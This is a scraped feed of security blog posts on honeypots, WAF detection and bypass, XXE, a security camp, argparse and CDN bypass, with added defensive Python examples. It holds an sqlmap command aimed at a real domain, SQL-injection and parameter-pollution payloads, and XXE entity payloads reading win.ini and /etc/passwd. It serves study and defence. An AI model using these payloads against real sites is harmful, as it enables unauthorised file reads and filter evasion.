<content type="html"><![CDATA[<blockquote><p>Notes on an article about cloud honeypots I read on a WeChat public account.</p></blockquote><p>Source: <a href="https://mp.weixin.qq.com/s?__biz=MjM5NzA3Nzg2MA==&mid=2649850797&idx=1&sn=613b99fb34f8981ac9443751350c162a&chksm=beda55a689addcb0a419a3f125dcc2c10f34f914de3a94d19f29fd41a83884ca7a549629b452&mpshare=1&scene=23&srcid=0310ZUYFGHI200bvmbf8Xeym&sharer_sharetime=1615365828620&sharer_shareid=6667ab5df2c656171aa24aeecfcd6fe5#rd">Knownsec (知道创宇)</a></p><p><a href="https://github.com/paralax/awesome-honeypots/blob/master/README_CN.md">A curated list of honeypots</a></p><h3 id="“云蜜罐”是什么?"><a href="#“云蜜罐”是什么?" class="headerlink" title="What is a cloud honeypot?"></a>What is a cloud honeypot?</h3><p><strong>No software or hardware to install, no cloud host to rent and no customer resources consumed: the honeypot is deployed quickly in the cloud, and it can be attached to the customer's domain names.</strong></p><h3 id="与传统蜜罐有何不同"><a href="#与传统蜜罐有何不同" class="headerlink" title="How it differs from traditional honeypots"></a>How it differs from traditional honeypots</h3><p>Besides the different deployment model, the main advantage of a cloud honeypot over a traditional one is that cloud deployment <strong>uses none of the customer's resources and has no impact on existing services</strong>. One-click deployment in the cloud is quick and safe, which suits website defence in particular. In the upcoming attack-and-defence exercises, a defender who notices that an already protected website is being attacked need not simply absorb the hits: <strong>quickly deploying a cloud honeypot is an emergency measure that senses the threat, records the attacker's traces and creates a chance to trace and counter the attacker</strong>.</p><h3 id="用法"><a href="#用法" class="headerlink" title="Usage"></a>Usage</h3><p><strong>A tailored trap for subdomain brute-forcing.</strong></p><p><strong>Given a registered root domain, the cloud honeypot's subdomain recommendation system automatically generates sensitive-looking subdomains and places traps on the path an attacker brute-forcing subdomains is bound to take, raising the chance of capturing the attacker</strong>, relieving some of the traffic load on real assets and hindering further intrusion.</p>]]></content>
<categories>
<category> Security </category>
</categories>
</entry>
<entry>
<title>About WAFs</title>
<link href="/2021/03/12/WAF/"/>
<url>/2021/03/12/WAF/</url>
<content type="html"><![CDATA[<h3 id="定义"><a href="#定义" class="headerlink" title="Definition"></a>Definition</h3><p>Web Application Firewall (WAF)</p><p>A product that protects web applications specifically, by applying a set of security policies to HTTP/HTTPS traffic.</p><h3 id="分类"><a href="#分类" class="headerlink" title="Types"></a>Types</h3><ul><li>Software WAF</li><li>Hardware appliance</li><li>Cloud WAF (a reverse proxy, similar to a CDN with protection built in)</li><li>WAF built into the website's own code</li></ul><h3 id="WAF-的判断"><a href="#WAF-的判断" class="headerlink" title="Detecting a WAF"></a>Detecting a WAF</h3><p>1. sqlmap</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sqlmap.py -u "https://baidu.com" --identify-waf --batch</span><br></pre></td></tr></table></figure><p>2. Manually</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">?test=1 union select 1,2,3%23</span><br></pre></td></tr></table></figure><p>Send the payload in a parameter that does not exist. If a WAF intercepts it, one of the following happens:</p><ul><li>The page cannot be reached</li><li>A different response code is returned</li><li>The response differs from that of a normal request</li></ul><h3 id="WAF-by-pass"><a href="#WAF-by-pass" class="headerlink" title="WAF bypass"></a>WAF bypass</h3><p>See my other post:</p><p><a href="https://h4m5t.top/%E5%AE%89%E5%85%A8/2021/02/11/WAF.html">WAF bypass techniques</a></p><p>A few more techniques:</p><ul><li>Split the payload across several parameters in one request</li><li>HTTP parameter pollution (the same parameter repeated several times; different middleware resolves the duplicates differently)</li><li>Use obscure functions</li></ul>]]></content>
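How the parameter-pollution bullet works in practice, as an added example rather than code from the post. It models three backends that resolve a repeated parameter differently (first value, last value, or all values joined with commas, the ASP.NET behaviour), beside a naive WAF rule that only looks at the first value and a hardened rule that looks at every value and at their concatenation. The SQL-injection pattern is a deliberately tiny stand-in for a real rule set, and the two requests are constructed.

```python
"""HTTP parameter pollution against a WAF that inspects only one value.

Added example, not code from the post. SQLI_RE is a deliberately tiny
stand-in for a real rule set; POLLUTED and SPLIT are constructed requests.
"""
import re
from urllib.parse import parse_qs

SQLI_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def param_values(query, name):
    """Every value sent for the parameter, in order (parse_qs keeps duplicates)."""
    return parse_qs(query, keep_blank_values=True).get(name, [])


def backend_value(query, name, policy):
    """The value the application ends up using for a repeated parameter.

    'first': Servlet getParameter(), Flask request.args.get()
    'last':  PHP $_GET
    'join':  ASP.NET, which concatenates all values with commas
    """
    values = param_values(query, name)
    if not values:
        return None
    if policy == "first":
        return values[0]
    if policy == "last":
        return values[-1]
    if policy == "join":
        return ",".join(values)
    raise ValueError(f"unknown policy {policy!r}")


def naive_waf_blocks(query, name):
    """A rule that only inspects the first occurrence of the parameter."""
    first = backend_value(query, name, "first")
    return first is not None and SQLI_RE.search(first) is not None


def hardened_waf_blocks(query, name):
    """Inspect every occurrence and their comma-joined form, so the verdict
    holds whichever resolution policy the backend uses."""
    values = param_values(query, name)
    return any(SQLI_RE.search(v) for v in values + [",".join(values)])


# POLLUTED hides the whole payload in the second copy of id. SPLIT spreads it
# over both copies; only the comma-joined form reads as one statement, the
# comment hiding the comma that ASP.NET inserts.
POLLUTED = "id=1&id=1 union select 1,2,3--"
SPLIT = "id=1 union/*&id=*/select 1,2,3--"

if __name__ == "__main__":
    for query in (POLLUTED, SPLIT):
        print(query)
        print("  naive WAF blocks:    ", naive_waf_blocks(query, "id"))
        print("  hardened WAF blocks: ", hardened_waf_blocks(query, "id"))
        for policy in ("first", "last", "join"):
            print(f"  backend[{policy}] sees: {backend_value(query, 'id', policy)!r}")
```

The lesson for rule writers is in hardened_waf_blocks: a WAF cannot know which policy the backend behind it uses, so it has to evaluate every form the backend could possibly see.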
<categories>
<category> Security </category>
</categories>
</entry>
<entry>
<title>XXE Vulnerabilities</title>
<link href="/2021/03/12/XXE/"/>
<url>/2021/03/12/XXE/</url>
<content type="html"><![CDATA[<h3 id="定义"><a href="#定义" class="headerlink" title="Definition"></a>Definition</h3><p>XML External Entity injection (XXE). When an XML parser is allowed to resolve external entities, a crafted document can read arbitrary files, execute system commands (where the parser offers such a wrapper, for example PHP's expect extension), probe internal hosts and ports and attack internal websites.</p><h3 id="XXE的利用"><a href="#XXE的利用" class="headerlink" title="Exploiting XXE"></a>Exploiting XXE</h3><ul><li>Reading local sensitive files</li><li>Discovering internal hosts</li><li>Probing host ports</li><li>Blind (out-of-band) XXE</li><li>File upload</li><li>Phishing</li></ul><h3 id="文章参考"><a href="#文章参考" class="headerlink" title="Reference"></a>Reference</h3><p>An article on XXE from the Xianzhi community:</p><p><a href="https://xz.aliyun.com/t/3357#toc-17">XXE vulnerabilities and their exploitation</a></p><img src="https://i.loli.net/2021/03/12/LJMZdOSA71DbTB8.png" alt="img" style="zoom: 67%;" /><p>A file-read payload from that article: it declares an external entity and the parser expands it inside the <code>lastname</code> element, which the application then echoes back.</p><figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"utf-8"</span>?></span> </span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">updateProfile</span> [<span class="meta"><!ENTITY <span class="keyword">file</span> <span class="keyword">SYSTEM</span> <span class="string">"file:///c:/windows/win.ini"</span>></span> ]></span> </span><br><span class="line"><span class="tag"><<span class="name">updateProfile</span>></span> </span><br><span class="line">    <span class="tag"><<span class="name">firstname</span>></span>Joe<span class="tag"></<span class="name">firstname</span>></span> </span><br><span class="line">    <span class="tag"><<span class="name">lastname</span>></span><span class="symbol">&file;</span><span class="tag"></<span class="name">lastname</span>></span> </span><br><span class="line">    ... </span><br><span class="line"><span class="tag"></<span class="name">updateProfile</span>></span></span><br></pre></td></tr></table></figure><h3 id="防护"><a href="#防护" class="headerlink" title="Defences"></a>Defences</h3><ul><li>Disable external entity resolution in the parser</li><li>Filter user-supplied XML data</li></ul>]]></content>
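The first defence above, turned into code as an added example; it is not code from the post or from the linked article. Instead of a regex over the raw bytes, it asks expat, the parser underneath Python's standard-library XML modules, to report every entity declaration and external reference it meets, and rejects the document before ElementTree ever sees it. The XXE document is the article's file-read payload with a Linux path; the benign document is constructed.

```python
"""Reject XML that declares entities before the application parses it.

Added example; not code from the post or the linked article. XXE is the
article's file-read payload with a Linux path; BENIGN is constructed.
"""
import xml.parsers.expat
import xml.etree.ElementTree as ET


class XXEBlocked(Exception):
    """Raised when a document declares entities or references external ones."""


def scan_for_entities(data):
    """Run expat over the document with DTD callbacks and raise on any entity.

    Rejecting internal entities too closes the 'billion laughs' expansion
    attack; external ones are the XXE case. Nothing is fetched: returning 0
    from the external-reference handler makes expat abort instead.
    """
    parser = xml.parsers.expat.ParserCreate()
    findings = []

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        kind = "external" if system_id else "internal"
        findings.append((kind, name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        findings.append(("external-ref", context, system_id))
        return 0  # 0 = stop parsing; expat then raises ExpatError

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        if not findings:
            raise  # genuinely malformed input, not an entity problem
    if findings:
        raise XXEBlocked(findings)


def safe_fromstring(data):
    """Parse with ElementTree only after the entity scan has passed."""
    scan_for_entities(data)
    return ET.fromstring(data)


def is_xxe(data):
    """True if the scan would reject the document."""
    try:
        scan_for_entities(data)
    except XXEBlocked:
        return True
    return False


def lastname_of(data):
    """The application's actual job: read one field of the profile update."""
    return safe_fromstring(data).findtext("lastname")


BENIGN = (b"<updateProfile><firstname>Joe</firstname>"
          b"<lastname>Doe</lastname></updateProfile>")
XXE = (b'<!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///etc/passwd">]>'
       b"<updateProfile><firstname>Joe</firstname>"
       b"<lastname>&file;</lastname></updateProfile>")

if __name__ == "__main__":
    print("benign lastname:", lastname_of(BENIGN))
    try:
        lastname_of(XXE)
    except XXEBlocked as exc:
        print("blocked:", exc.args[0])
```

Running it prints Doe for the benign document and the list of findings for the payload, including the external entity named file with its file:///etc/passwd system identifier. Where a parser library exposes a switch to disable DTD processing entirely, that switch is the simpler choice; this scan is for the cases where the application must accept a DOCTYPE but never an entity.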
<categories>
<category> Vulnerabilities </category>
</categories>
</entry>
<entry>
<title>ByteDance Security Risk Control Training Camp Summary</title>
<link href="/2021/03/11/%E5%AD%97%E8%8A%82/"/>
<url>/2021/03/11/%E5%AD%97%E8%8A%82/</url>
<content type="html"><![CDATA[<blockquote><p>Over the winter break I took part in the ByteDance security training camp and got quite a lot out of it. I learned some security knowledge and met some people, all undergraduates and master's students from well-known universities. My impression is that ByteDance's security engineers are pragmatic and very capable; one of their classes was more useful than a semester at school. It strengthened my intention to go into industry. I also feel that academic security research is badly out of step with industry; in an era where industry leads the way and feeds back into academia, perhaps a company is where one learns more.</p></blockquote><h3 id="先放上证书纪念一下"><a href="#先放上证书纪念一下" class="headerlink" title="先放上证书纪念一下"></a>First, the certificate, as a keepsake</h3><img src="https://i.loli.net/2021/03/10/vFdy6lhixMfsA1K.png" alt="image-20210310185934547" style="zoom: 50%;" /><h3 id="课程内容"><a href="#课程内容" class="headerlink" title="课程内容"></a>Course content</h3><ul><li>Web security overview</li><li>Advanced penetration testing</li><li>Building a WAF</li><li>Security system architecture design</li></ul><h3 id="小组任务"><a href="#小组任务" class="headerlink" title="小组任务"></a>Group task</h3><p>The organisers provided a cloud host with a web vulnerability range preloaded as a Docker image.</p><ul><li>Penetration-test the range and find the security issues it contains.</li><li>Develop or deploy a Web Application Firewall (WAF) that effectively protects against the issues found.</li><li>Build a WAF management backend for rule configuration and log queries.</li></ul><h3 id="WAF研发"><a href="#WAF研发" class="headerlink" title="WAF研发"></a>WAF development</h3><ul><li>Decoding (common encodings, mixed encodings, multiple encoding layers)</li><li>String matching (single-pattern, multi-pattern)</li><li>Regular-expression engine (hyperscan)</li><li>Rule extraction and tuning (from vulnerabilities and payloads; balancing false negatives against false positives)</li><li>Open-source rule set (OWASP® ModSecurity Core Rule Set (CRS))</li><li>API rate limiting (rate-limiting algorithms, per-resource limits, per-user limits)</li><li>Self-learning of the application's normal traffic baseline</li><li>Bot detection (human/machine identification, behaviour analysis)</li></ul><h3 id="寻找漏洞"><a href="#寻找漏洞" class="headerlink" title="寻找漏洞"></a>Finding vulnerabilities</h3><ul><li>SQL injection in the user login endpoint</li><li>Local file inclusion (path brute-forcing)</li><li>Horizontal and vertical privilege escalation (changing <code>student_id</code> in the cookie exposes other users' information)</li><li>Server-side request forgery (SSRF) via the avatar URL</li><li>Sensitive information disclosure (directory brute-forcing turned up ID-card numbers)</li><li>Brute-force attacks</li><li>Other<ul><li>Cookie lifetime too long</li><li>httpOnly attribute not set</li><li>Secure attribute not set</li><li>Insecure storage scheme (passwords stored as MD5 hashes, easily cracked)</li><li>Missing HTTP security headers (CSP)</li></ul></li></ul>]]></content>
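<![CDATA[<p>An added example (my own code, not from the camp or this post) of the first two WAF building blocks listed above, decoding and rule matching: a request parameter is percent- and HTML-entity-decoded repeatedly until it stops changing, the number of decoding layers is kept as a signal in its own right (several layers of encoding in a login parameter are rarely legitimate), and the normalised value is then matched against a few detection rules for the SQL injection and local file inclusion issues found in the range. The rule ids, the round limit and the sample values are constructed for this example.</p>

```python
import html
import re
from urllib.parse import unquote

# Upper bound on decode passes: a value still changing after this many rounds is
# flagged rather than decoded forever (a cheap denial-of-service guard).
MAX_DECODE_ROUNDS = 5

# Detection rules: (id, compiled pattern, what it looks for). Kept deliberately
# small; the false-positive/false-negative balance is tuned per application.
RULES = [
    ("sqli-tautology", re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I), "quote followed by OR n=n"),
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I), "UNION SELECT"),
    ("lfi-traversal", re.compile(r"(?:\.\.[/\\]){2,}"), "repeated ../ path traversal"),
]


def normalize(value: str, max_rounds: int = MAX_DECODE_ROUNDS):
    """Strip encoding layers until the value is stable; return (value, rounds).

    One round = percent-decoding followed by HTML-entity decoding, so mixed
    encodings such as %26%2339%3B (-> &#39; -> ') fall out in a single pass
    while double percent-encoding (%2527 -> %27 -> ') takes two.
    """
    current = value
    rounds = 0
    while rounds < max_rounds:
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def inspect(value: str) -> dict:
    """Normalise one parameter value and report which rules it triggers."""
    normalized, rounds = normalize(value)
    hits = [rule_id for rule_id, pattern, _ in RULES if pattern.search(normalized)]
    if rounds >= 2:
        # Multiple encoding layers are themselves an evasion indicator.
        hits.append("multi-layer-encoding")
    if rounds == MAX_DECODE_ROUNDS and html.unescape(unquote(normalized)) != normalized:
        hits.append("decode-limit-reached")
    return {
        "normalized": normalized,
        "decode_rounds": rounds,
        "rules": hits,
        "block": bool(hits),
    }


# Constructed sample values for the login form's username parameter.
SAMPLES = [
    "admin",                                   # benign
    "%2527%2520or%25201%253D1",                # double percent-encoded ' or 1=1
    "%26%2339%3B%20OR%20%271%27%3D%271",       # HTML entity inside percent-encoding
    "..%2F..%2Fetc%2Fpasswd",                  # path traversal, single layer
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = inspect(sample)
        print(f"{sample!r:40} -> {result['normalized']!r:22} rounds={result['decode_rounds']} rules={result['rules']}")
```

<p>Decoding before matching is what makes a single rule catch all the encoded variants; the round counter is the part that turns "how many layers did we peel" into a detection signal of its own.</p>]]>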
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>Python Command-Line Parsing with Argparse</title>
<link href="/2021/03/10/%E5%8F%82%E6%95%B0/"/>
<url>/2021/03/10/%E5%8F%82%E6%95%B0/</url>
<content type="html"><![CDATA[<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line">parser.parse_args()</span><br></pre></td></tr></table></figure><p>The <code>argparse</code> module automatically generates help and usage messages and reports an error when the user passes the program invalid arguments.</p><p><code>default</code>: the value used when the argument is not supplied</p><p><code>required</code>: whether the argument must be supplied</p><p><code>type</code>: the argument's type</p><p>The default type is <code>str</code>; if your program needs an integer or boolean argument, set <code>type=int</code> or <code>type=bool</code>.</p><p><code>choices</code>: the value must be one of a fixed set of options</p><p><code>help</code>: the description shown for the argument</p><p><code>dest</code>: the name of the variable the argument is stored in</p><p>By default argparse names the variable after the string following <code>--</code> or <code>-</code>, but you can set <code>dest=xxx</code> to choose the name yourself and then read the value as <code>args.xxx</code>.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"></span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line"></span><br><span class="line">parser.add_argument(<span class="string">"--square"</span>, <span class="built_in">help</span>=<span class="string">"display a square of a given number"</span>, <span class="built_in">type</span>=<span class="built_in">int</span>)</span><br><span class="line">parser.add_argument(<span class="string">"--cubic"</span>, <span class="built_in">help</span>=<span class="string">"display a cubic of a given number"</span>, <span class="built_in">type</span>=<span class="built_in">int</span>)</span><br><span class="line"></span><br><span class="line">args = parser.parse_args()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> args.square:</span><br><span class="line">    <span class="built_in">print</span>(args.square ** <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> args.cubic:</span><br><span class="line">    <span class="built_in">print</span>(args.cubic ** <span class="number">3</span>)</span><br></pre></td></tr></table></figure>]]></content>
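<![CDATA[<p>An added example (my own code, not from the post) that exercises every option explained above in one parser: <code>required</code>, <code>default</code>, <code>type</code>, <code>choices</code>, <code>help</code> and <code>dest</code>. The argument names and the <code>scan-demo</code> program name are invented for the example. One practical point the post does not mention is that <code>type=bool</code> does not parse <code>"False"</code> as false (any non-empty string is truthy), so a boolean switch is better declared with <code>action="store_true"</code>, as done here.</p>

```python
import argparse
import contextlib
import io


def build_parser() -> argparse.ArgumentParser:
    """Parser exercising default, required, type, choices, help and dest."""
    parser = argparse.ArgumentParser(
        prog="scan-demo",
        description="Demonstrates the argparse options explained above.",
    )
    # required=True: argparse exits with an error if --name is missing.
    parser.add_argument("--name", required=True, help="job name (mandatory)")
    # type=int converts the string for you and rejects non-integers;
    # %(default)s in help text is expanded by argparse.
    parser.add_argument("--count", type=int, default=1,
                        help="how many times to run (default: %(default)s)")
    # choices: anything outside the list is an error.
    parser.add_argument("--mode", choices=["fast", "full"], default="fast",
                        help="scan depth")
    # dest: the value is read as args.outfile, not args.out.
    parser.add_argument("--out", dest="outfile", default="report.txt",
                        help="where to write the report")
    # A real boolean flag. type=bool would turn "--verbose False" into True,
    # because bool("False") is True.
    parser.add_argument("--verbose", action="store_true", help="chatty output")
    return parser


def parse(argv):
    """Parse argv (a list, not sys.argv itself) and return the Namespace."""
    return build_parser().parse_args(argv)


def parse_quietly(argv):
    """Return the Namespace, or None when argparse rejects argv.

    parse_args() reports problems by printing to stderr and raising SystemExit;
    catching that (and silencing stderr) lets a caller treat a bad command line
    as a value instead of a process exit.
    """
    try:
        with contextlib.redirect_stderr(io.StringIO()):
            return parse(argv)
    except SystemExit:
        return None


if __name__ == "__main__":
    import sys
    args = parse(sys.argv[1:])
    print(f"{args.name}: {args.mode} x{args.count} -> {args.outfile} (verbose={args.verbose})")
```

<p>Run it as <code>python scan-demo.py --name nightly --count 3 --mode full --out r.json --verbose</code>; <code>--help</code> shows the generated usage text, and a wrong <code>--mode</code> value or a non-numeric <code>--count</code> is rejected before your code runs.</p>]]>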
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>Bypassing CDNs</title>
<link href="/2021/03/09/CDN/"/>
<url>/2021/03/09/CDN/</url>
<content type="html"><![CDATA[<blockquote><p>CDN stands for Content Delivery Network. A CDN is an intelligent virtual network built on top of the existing network: relying on edge servers deployed in many locations and on the central platform's load-balancing, content-distribution and scheduling modules, it lets users fetch content from a nearby node, which reduces network congestion and improves response time and cache hit rate. Its key technologies are content storage and content distribution.</p></blockquote><p>Step 1: determine whether the target website uses a CDN.</p><p><img src="https://i.loli.net/2021/02/21/5WotaMguZxOL7Rv.png" alt="img"></p><ul><li>Ping the domain and look at how it resolves.</li><li>Use a multi-location ping service and compare the results from each region; if they are all identical, no CDN is in use.</li></ul><p>Step 2: bypass the CDN to find the real IP.</p><p><img src="https://i.loli.net/2021/02/21/tex7XNCMAO2fSuQ.png" alt="image-20210221100509778"></p><ul><li>Scan the site for test files</li><li>IP ranges of subdomains</li><li>Access from abroad</li><li>Historical DNS resolution records</li><li>Resolution through different DNS servers (nslookup <a href="http://www.example.com/">www.example.com</a> 8.8.8.8)</li><li>Sensitive file leaks</li><li>IP address in bounced email</li><li>Capturing the mobile app's traffic</li></ul><p><img src="https://i.loli.net/2021/03/09/bZQCNBcoJIOr1jL.png" alt="image-20210309201255404"></p>]]></content>
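<![CDATA[<p>An added example (my own code, not from the post) for step 1, the CDN check. It works offline on <code>dig +short</code> output captured from several resolvers, compares the address sets the way the multi-location ping comparison does, and adds the check a practitioner usually runs first: whether the CNAME chain points into a well-known CDN provider's domain. The <code>d111111abcdef8.cloudfront.net</code> name is the placeholder used in Amazon's documentation, the addresses are from the reserved documentation ranges, and the resolver labels are constructed. One caveat from my own experience rather than the post: identical answers everywhere do not prove the absence of a CDN, because anycast CDNs (Cloudflare, for example) return the same addresses from every vantage point; the CNAME check catches those.</p>

```python
import ipaddress

# CNAME suffixes of well-known CDN providers (public knowledge; extend as needed).
CDN_CNAME_SUFFIXES = {
    "cloudflare.net": "Cloudflare",
    "cloudfront.net": "Amazon CloudFront",
    "akamaiedge.net": "Akamai",
    "edgekey.net": "Akamai",
    "edgesuite.net": "Akamai",
    "fastly.net": "Fastly",
}


def parse_dig_short(output: str):
    """Split `dig +short` output into (cnames, ips).

    dig +short prints one answer per line: CNAME targets end with a dot,
    A/AAAA answers are bare addresses. Anything that is not an address is
    treated as a name.
    """
    cnames, ips = [], []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ips.append(str(ipaddress.ip_address(line)))
        except ValueError:
            cnames.append(line.rstrip(".").lower())
    return cnames, ips


def cdn_provider(cnames):
    """Return the provider name if any CNAME falls under a known CDN domain."""
    for name in cnames:
        for suffix, provider in CDN_CNAME_SUFFIXES.items():
            if name == suffix or name.endswith("." + suffix):
                return provider
    return None


def assess(answers_by_resolver: dict) -> dict:
    """answers_by_resolver maps a resolver label to its `dig +short` output."""
    ip_sets = {}
    all_cnames = []
    for resolver, output in answers_by_resolver.items():
        cnames, ips = parse_dig_short(output)
        ip_sets[resolver] = frozenset(ips)
        all_cnames.extend(cnames)

    provider = cdn_provider(all_cnames)
    answers_differ = len(set(ip_sets.values())) > 1

    reasons = []
    if provider:
        reasons.append(f"CNAME points into {provider}")
    if answers_differ:
        reasons.append("different resolvers return different address sets")
    # No reasons means "no indicator found", not "no CDN": anycast CDNs answer
    # identically everywhere and the suffix table is not exhaustive.
    return {
        "likely_cdn": bool(reasons),
        "provider": provider,
        "answers_differ": answers_differ,
        "ips": ip_sets,
        "reasons": reasons,
    }


# Constructed `dig +short www.example.com @<resolver>` captures.
SAMPLE_ANSWERS = {
    "8.8.8.8": "d111111abcdef8.cloudfront.net.\n198.51.100.10\n198.51.100.11\n",
    "1.1.1.1": "d111111abcdef8.cloudfront.net.\n203.0.113.5\n203.0.113.6\n",
}

if __name__ == "__main__":
    verdict = assess(SAMPLE_ANSWERS)
    print(verdict["likely_cdn"], verdict["provider"], verdict["reasons"])
```

<p>Feed it real captures by running <code>dig +short target @resolver</code> once per resolver and storing each output under its own key; the two indicators are independent, so a hit on either is enough to treat the visible addresses as edge nodes rather than the origin.</p>]]>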
<categories>
<category> Penetration testing </category>
</categories>
</entry>